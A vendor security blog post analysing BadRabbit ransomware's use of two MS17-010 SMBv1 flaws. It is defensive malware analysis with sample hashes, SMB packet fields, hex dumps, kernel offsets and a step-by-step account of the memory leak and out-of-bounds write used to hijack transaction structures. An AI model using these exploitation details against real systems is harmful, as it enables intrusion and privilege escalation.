![Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VIDEO]](https://assets.crowdstrike.com/is/image/crowdstrikeinc/video-ATTCK2-1)
![Qatar’s Commercial Bank Chooses CrowdStrike Falcon®: A Partnership Based on Trust [VIDEO]](https://assets.crowdstrike.com/is/image/crowdstrikeinc/Edward-Gonam-Qatar-Blog2-1)
![Endpoint Protection and Threat Intelligence: The Way Forward [VIDEO]](https://assets.crowdstrike.com/is/image/crowdstrikeinc/GK-Blog_Images-1)
Overview
On October 23, 2017, CrowdStrike® became aware of a new type of ransomware called BadRabbit. The initial infection occurred via a drive-by download masquerading as an Adobe Flash update. Once downloaded, the malware required user interaction in order to execute. After that occured, BadRabbit could self-propagate across a network by using stolen credentials either via a tool based on Mimikatz, reusing an authenticated session, or brute-forcing account credentials to exploit multiple vulnerabilities in Server Message Block (SMB) version 1. The CrowdStrike Falcon® endpoint protection (EPP) platform provides defense against this variant of ransomware. For Falcon customers, this can be enabled by turning on the prevention features within the product. This blog provides a technical analysis of the exploits used by BadRabbit. Here are the sample hashes that were analyzed: Dropper: 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da infpub.dat: 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648 Upon detonation of the malware, the CrowdStrike Security Response Team (SRT) noticed a couple of things: first, attempts to leverage credentials dumped via Mimikatz, and second, an odd SMB network activity that appeared similar to one of the SMBv1 vulnerabilities in MS17-010when exploited. The team immediately dug into the code to sort out where
the network traffic came from, and found
the exploit code located directly after one of the brute force routines. From there, we were able to work out the specific vulnerabilities being exploited and how BadRabbit leverages them to spread across a network. MS17-010 is the Microsoft Security Bulletin released on March 14, 2017 that covers the multiple exploits discovered in the Shadow Brokers’ dump. In that dump, there was a tool called Fuzzbunch that contained several binaries (EternalRomance, EternalBlue, etc). Each of these binaries exploits one or more of the vulnerabilities identified in the security bulletin. On October 26, 2017, Talos posted an update to its blog indicating that a similar MS17-010 vulnerability was used by EternalRomance to exploit hosts. The blog includes a link to an exploit built by Worawit Wang (_sleepya, on Twitter) that uses two vulnerabilities in MS17-010 to exploit a system via privilege escalation. Although our analysis was complete, we went back and fixed a few incorrect assumptions related to kernel structure offsets using Worawit’s code. (The link is in the resources section at the end of the blog.) The analysis below explains how this exploit works, and provides concrete values based on our detonation in a Windows 7 SP1 x86 environment.
Technical Analysis
BadRabbit exploits two of the vulnerabilities covered in the MS17-010 security bulletin:- CVE-2017-0146
- A race condition using SMB_COM_NT_TRANSACT requests to leak kernel memory
- CVE-2017-0143
- Allows an out-of-bounds (OOB) write to modify a memory-adjacent data structure
- 0x10001CA3 - SMB session setup function
- 0x10002191- Named pipe connection function
- 0x100046C7 - Exploit MS17-010 function
- 0x100021DC - Close and disconnect post exploitation function
- 0x10001EB9 - Connect ADMIN$ share
- 0x10002054 - Check for cscc.dat
- 0x10004AB5 - Write BadRabbit malware (infpub.dat)
- 0x1000516B - RPC svcctl service setup function
Establishing the SMB Connection
An initial SMB connection attempt is made using the hardcoded username/password combinations within the BadRabbit binary. Any successful SMB authentication will launch into the MS17-010 privilege escalation exploit. SMB Negotiate Protocol Request SMB Negotiate Protocol Response
SMB Session Setup Request, NTLMSSP_NEGOTIATE
SMB Session Setup Response, NTLMSSP_CHALLENGE, Error: STATUS_MORE_PROCESSING_REQUIRED
SMB Session Setup Request, NTLMSSP_AUTH, User: \Administrator
SMB Session Setup Response
SMB Tree Connect AndX Request, Path: \\172.16.1.133\IPC$ SMB Tree Connect AndX Response
SMB Nt Create Andx Request, FID: 0x4000, Path: atsvc
SMB Nt Create Andx Response, FID: 0x4000
Test for Vulnerable Condition
Similar to NotPetya, WannaCry, and Fuzzbunch, BadRabbit tests to determine if the target machine is vulnerable to MS17-010. The test, itself, however, is different from its counterparts in previous attacks. Rather than generate an invalid response from the server, BadRabbit leaks kernel memory and then verifies the leaked data.SMBv1 contains a vulnerable race condition triggered by sending an SMB_COM_NT_TRANSACT request, followed immediately by an SMB_COM_NT_TRANSACT_SECONDARY request. This occurs when the MaxBufferSize (set during session setup) is smaller than the size of the response from the target. In this example, the MaxBufferSize is set to 4356, and the size of the response is established by setting MaxParameterCount to 16188. The SMB_COM_NT_TRANSACT_SECONDARY request indicates the number of bytes to leak by setting DataCount to 276.
SMB Header
Tree ID:
2048
Process ID:
65279
User ID:
2048
Multiplex ID:
5812
NT Trans Request (0xA0)
Total Parameter Count:
4
Total Data Count:
4356
Max Parameter Count:
16188
Max Data Count:
4304
Parameter Count:
4
Parameter Offset:
76
Data Count:
4304
Data Offset:
80
Setup Count:
0
Function NT RENAME (5)
Byte Count: 4311
Padding: 000000
NT Rename Data
(4311 random junk bytes)
SMB Header
Tree ID:
2048
Process ID:
65279
User ID:
2048
Multiplex ID:
5812
NT Trans Secondary Request (0xA1)
Total Data Count:
276
Parameter Count:
0
Parameter Offset:
0
Parameter Displacement:
0
Data Count:
276 // Number of bytes to leak
Data Offset:
72
Byte Count:
1link.
0000h: 00 56 AD 04 D7 0B DB D4 9E 4D 8C 9C EF 9F 04 29
.V.×.ÛÔžMŒœïŸ.)
0010h: B4 54 1D 74 4B 5D D3 1C 2F FF FF FF 00 C8 50 00
´T.tK>Ó./ÿÿÿ.ÈP.
0020h: 00 00 08 01 06 46 72 61 67 01 08 E6 01 46 72 65
.....Frag..æ.Fre
0030h: 65 68 15 93 84 68 15 93 84 FF FF FF 00 FF FF FF
eh.“„h.“„ÿÿÿ.ÿÿÿ
0040h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0050h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0060h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0070h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0080h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0090h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
00A0h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
00B0h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
00C0h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
00D0h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
00E0h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
00F0h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0100h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0110h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF
.ÿÿÿ.ÿÿÿ.ÿÿÿ.ÿÿÿ
0120h: 00 FF FF FF 00 FF FF FF 00 FF FF FF 00
.ÿÿÿ.ÿÿÿ.ÿÿÿ.Leaking a Transaction Data Structure
Once it is confirmed the system is vulnerable to MS17-010, a useful information leak can be manufactured, which will contain datafor carrying out a privilege escalation exploit. An SMB_COM_TRANSACTION data structure is going to be leaked from kernel memory using the same bug.
Packet Sandwich
In order to leak something useful to manipulate memory, a large packet containing 17 requests is sent from the attacker to the target. Each request contains a different Multiplex ID (MID). A MID is a unique way to identify a single transaction. For the purposes of this analysis the Multiplex IDs that are generated based on the test results are going to be consistently used throughout. Just note that the MID will be different between tests.- SMB_COM_NT_TRANSACT
- SMB_COM_NT_TRANSACT_SECONDARY
- This combined with the NT Rename Trans will create the information leak
- SMB_COM_NT_TRANSACT
- Multiplex ID is the same as the File ID (FID)
- This transaction is going to be used to write to the adjacent data structure
- SMB_COM_TRANSACTION
- MID 5377, this transaction is going to be corrupted at a later point via the same bug that is used by EternalRomance
- SMB_COM_TRANSACTION
- MID 5378, padding
- SMB_COM_TRANSACTION
- MID 5379, this is the data structure that is going to be leaked
- 9 SMB_COM_TRANSACTIONs
- MID 5380-5388
0000h: 00 6D 30 4F E9 A7 76 DE 5B 3B 45 13 15 3B F6 34
.m0Oé§vÞ<;E..;ö4
0010h: 5A B8 E3 80 7B 87 1F 13 35 00 00 00 00 20 50 00
Z¸ã€{‡..5.... P.
0020h: 00 00 02 01 06 46 72 61 67 01 02 FB 07 4C 53 74
.....Frag..û.LSt
0030h: 72 C8 0F 00 00 00 00 00 00 0C 02 C8 0F 00 00 00
rÈ.........È....
0040h: 00 58 30 CD 85 F0 79 25 86 58 FA 4C 86 D8 3D 4D
.X0Í…ðy%†XúL†Ø=M
0050h: 86 50 60 51 86 28 10 22 A6 00 00 00 00 00 00 02
†P`Q†(."¦.......
0060h: 00 D8 00 51 86 CD A6 00 00 FF FF FF FF 00 00 00
.Ø.Q†Í¦..ÿÿÿÿ...
0070h: 00 DC 00 51 86 00 00 00 00 DC 00 51 86 00 10 51
.Ü.Q†....Ü.Q†..Q
0080h: 86 DC 02 51 86 00 10 51 86 00 00 00 00 00 00 00
†Ü.Q†..Q†.......
0090h: 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00
................
00A0h: 00 24 0D 00 00 00 00 00 00 00 00 00 00 01 01 00
.$..............
00B0h: 00 00 00 00 08 FF FE 00 08 03 15 00 00 00 00 00
.....ÿþ.........
00C0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01
................
00D0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00
..............@.
00E0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
00F0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
0100h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
0110h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
0120h: 00 00 00 00 00 00 00 00 00 00 00 00 00
............."Frag," and instead of "Free," "LStr." Now the leaked data can be mined for useful information.
Leaked Transaction
The hex dump below contains the leaked SMB_COM_TRANSACTION from above with the extraneous data trimmed. The highlighted bytes “00 08 FF FE 00 08” are the Tree ID, Process ID and User ID for the SMB connection. The Tree ID is a unique identifier that represents an open connection to a share. Process ID is assigned on the client end of the SMB connection and identifies the process on the client that initiated the request. The User ID represents the authenticated connection to the share.
0000h: 0C 02 C8 0F 00 00 00 00 58 30 CD 85 F0 79 25 86
..È.....X0Í…ðy%†
0010h: 58 FA 4C 86 D8 3D 4D 86 50 60 51 86 28 10 22 A6
XúL†Ø=M†P`Q†(."¦
0020h: 00 00 00 00 00 00 02 00 D8 00 51 86 CD A6 00 00
........Ø.Q†Í¦..
0030h: FF FF FF FF 00 00 00 00 DC 00 51 86 00 00 00 00
ÿÿÿÿ....Ü.Q†....
0040h: DC 00 51 86 00 10 51 86 DC 02 51 86 00 10 51 86
Ü.Q†..Q†Ü.Q†..Q†
0050h: 00 00 00 00 00 00 00 00 04 00 00 00 00 02 00 00
................
0060h: 00 00 00 00 00 00 00 00 24 0D 00 00 00 00 00 00
........$.......
0070h: 00 00 00 00 01 01 00 00 00 00 00 08 FF FE 00 08
............ÿþ..
0080h: 03 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
0090h: 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00
................
00A0h: 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00
.....@..........
00B0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
00C0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
00D0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
00E0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
00F0h: 00 00 00 00
....Looking back at the “Packet Sandwich” section, MID 5379 is one of the multiple requests inside that packet.
Useful Memory Addresses
A lot of useful data is pulled from the information leak:- 0x0C - Connection Structure address
- 0x862579F0
- 0x10 - Session Structure address
- 0x864CFA58
- 0x14 - TreeConnect address
- 0x864D3DD8
- 0x18 - _FLINK Address
- 0x86516050
Taking Control of a Transaction
Now BadRabbit needs to take control of a transaction data structure. To do this, it exploits one of the vulnerabilities used by EternalRomance.
Figure 7: Exploiting the Out-of-Bounds Write
The graphic above is a layout of how EternalRomance exploits the vulnerability. BadRabbit does not use a TRANS_READ_NMPIPE request as the initial request, but rather an SMB_COM_NT_TRANSACT request previously seen in the Packet Sandwich section. The MID of this request is set to the same File ID that was assigned earlier by the Nt Create AndX Request in the initialization section. An initial SMB_COM_WRITE_ANDX request is set to raw mode, the MID = 0x4000 (same as the File ID), and the DataLength is set to 512 bytes.
SMB Header
Tree ID:
2048
Process ID:
65279
User ID:
2048
Multiplex ID:
16384
NT Trans Secondary Request (0xA1)
Total Data Count:
1
Parameter Count:
0
Parameter Offset:
0
Parameter Displacement:
0
Data Count:
1
Data Offset:
72
Data Displacement:
15880
0000h: 00 00 FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C
..ÿSMB¡......HSL
0010h: 00 00 00 10 00 00 00 00 00 00 00 00 00 08 FF FE
..............ÿþ
0020h: 00 08 00 40 00 20 12 00 00 00 00 00 00 00 01 00
...@. ..........
0030h: 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00
.......0........
0040h: 01 00 00 00 48 00 00 00 00 40 08 3E 00 00 00 02
....H....@.>....
0050h: 00 00 00
...Modifying the Multiplex ID of MID 5377
BadRabbit uses this exploit to change the Multiplex ID of the adjacent transaction data structure. This is similar to EternalRomance, but the difference is that EternalRomance changes the MID to 0, while BadRabbit modifies the least significant byte of the Multiplex ID with 0x00. The hex representation of 5377 is “0x1503.” The “03” byte is what is going to be overwritten with 0x00, changing the MID to 5376.
Figure 9: Overwrites MID of Adjacent Transaction
Once complete, BadRabbit confirms this by sending an NT Trans Rename request to the target with the MID set to 5376. Due to the modification, the server responds with a non-specific error code. The Server Class field is set to 0x012 and the Error Code is set to 0x0001.
SMB NT Trans Request, NT RENAME
SMB NT Trans Response, NT RENAME, Error: Non specific error codeThe Writer Object
More than just the MID of the adjacent transaction can be modified using the method list above. For example, if the pointer to the buffer that receives data (InData Pointer) is modified, it means any subsequent transaction request that sends data and uses MID 5376 will overwrite any data pointed to, no matter what address is at that offset within the transaction data structure. BadRabbit uses this to modify the MID 5379 data structure that was leaked in a previous section.Changing the InData Ptr in MID 5376 to point to MID 5379 and Overwrite
Another SMB_COM_TRANSACTION_SECONDARY request where the MID is set to the File ID (FID) is going to be used to modify a pointer in the memory adjacent to the MID 5376 data structure. To do this, the DataDisplacement value is set to 15,824, and the base memory address of the MID 5379 data structure is going to be written to that offset.
Figure 11: Point MID 5376 InData Pointer to MID 5379
Calculating the base address of the MID 5379 Transaction data structure will require revisiting the information leaked that contained that data structure. A variety of pointers are located throughout the data structure. The InDataParameters buffer pointer located at offset 0x40 in the leaked transaction can be used to calculate the base address of the MID 5379 transaction.
0000h: 0C 02 C8 0F 00 00 00 00 58 30 CD 85 F0 79 25 86
..È.....X0Í…ðy%†
0010h: 58 FA 4C 86 D8 3D 4D 86 50 60 51 86 28 10 22 A6
XúL†Ø=M†P`Q†(."¦
0020h: 00 00 00 00 00 00 02 00 D8 00 51 86 CD A6 00 00
........Ø.Q†Í¦..
0030h: FF FF FF FF 00 00 00 00 DC 00 51 86 00 00 00 00
ÿÿÿÿ....Ü.Q†....
0040h: DC 00 51 86 00 10 51 86 DC 02 51 86 00 10 51 86
Ü.Q†..Q†Ü.Q†..Q†
0050h: 00 00 00 00 00 00 00 00 04 00 00 00 00 02 00 00
................
0060h: 00 00 00 00 00 00 00 00 24 0D 00 00 00 00 00 00
........$.......
0070h: 00 00 00 00 01 01 00 00 00 00 00 08 FF FE 00 08
............ÿþ..
0080h: 03 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
0090h: 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00
................
00A0h: 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00
.....@..........
00B0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
00C0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
00D0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
00E0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
00F0h: 00 00 00 00
....
Figure 13: Overwrite InDataParameters, OutParameters, and InData pointers
Three pointers are being overwritten in the MID 5379 data structure: InDataParameters, OutParameters, and InData. The address 0x8651038 that is used to overwrite the InData pointer for MID 5379, is the location of another transaction that is modified similar tothe way the MID 5377 was modified. Post analysis we came across code written by _sleepya (Worawit) that contains offset for the data structure (listed and linked in the references). Using the identified offsets it breaks down as follows:
- +0x40 - 0x86510038
- InDataParameters Buffer Pointer
- Set to the memory location of MID 5379
- This gives MID 5379 the ability to modify itself using an SMB request that contains parameters
- +0x44 - 0x86510238
- OutParameters Buffer Pointer
- MID 5379 + 0x200
- +0x48 - 0x86516038
- InData Buffer Pointer
- Offset of next transaction in the list
- Calculated from the _FLINK pointer (offset 0x18 in the MID 5379 info leak)
- Address of a linked transaction
- Used in the next section
Controlling Multiplex ID 5851
The original MID for this transaction is unknown, but it is going to be changed to 5851. This will allow the attacker to use it by referencing MID 5851 in future transaction requests. To accomplish this, an SMB_COM_TRANSACTION_SECONDARY request is made using MID 5379.SMB Header
Tree ID:
2048
Process ID:
65279
User ID:
2048
Multiplex ID:
5379
NT Trans Secondary Request (0xA1)
Total Data Count:
2
Parameter Count:
0
Parameter Offset:
0
Parameter Displacement:
0
Data Count:
2
Data Offset:
72
Data Displacement:
128
0000h: 00 00 FF 53 4D 42 A1 00 03 00 00 18 01 48 53 4C
..ÿSMB¡......HSL
0010h: 00 00 00 10 00 00 00 00 00 00 00 00 00 08 FF FE
..............ÿþ
0020h: 00 08 03 15 00 20 12 00 00 00 00 00 00 00 02 00
..... ..........
0030h: 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00
.......0........
0040h: 02 00 00 00 48 00 00 00 00 40 80 00 00 00 00 03
....H....@€.....
0050h: 00 00 DB 16
..Û.
Figure 15: MID 5379 Request to Change the MID to 5851
This transaction is going to be used to leak the address of a security context structure and then overwrite with values to elevate privileges to System.
Conclusion
As demonstrated, BadRabbit, exploits two of the vulnerabilities identified in MS17-010 to leak information and take control of multiple data structures.The second part of this blog post will cover how the controlled transactions will be leveraged to elevate privileges to System.Reference
Transaction Data Structure
Part of the followingis created from the code on _sleepya’s (Worawit)
github
and the rest is derived from analyzing the SrvSmbTransaction function in the SMB Driver (srv.sys). This is based on Windows 7 SP1 x86.
typedef struct _SMB_COM_TRANSACTION {
0x08:
LPVOIDPagePool;
0x0C:
LPVOIDConnectionStruct;
0x10:
LPVOIDSessionStruct;
0x14:
LPVOIDTreeConnectStruct;
0x18:
LPVOID_FLINK;
0x30:
DWORD Timeout;
0x40:
LPVOIDInParameter;
0x44:
LPVOIDOutParameter;
0x48:
LPVOIDInData;
0x4C:
LPVOIDOutData;
0x54:
DWORD MaxSetupCount;
0x58: ParameterCount;
0x5C: TotalParameterCount;
0x60:
DWORD MaxParameterCount;
0x68: TotalDataCount;
0x60:
DWORD MaxDataCount;
0x72:
LPVOIDTRANS_FUNCTION;
0x74:
0x78:
WORD Flags;
0x7A:
WORD TreeID;
0x7C:
WORD ProcID;
0x7E:
WORD UserID;
0x80:
WORD
MultiplexID;
}
SMB_COM_TRANSACTION; Resources
Worawit Wang’s Exploit Code
We discovered Worawit's (_sleepya on Twitter) github after doing the analysis. It was used to fill in incorrect assumptions and gaps (references throughout this article). This exploit code was used to model the exploit used by BadRabbit. Check out the rest of Worawit Wang'sgithub. It contains a significant amount of analysis on MS17-010 done by Worawit.
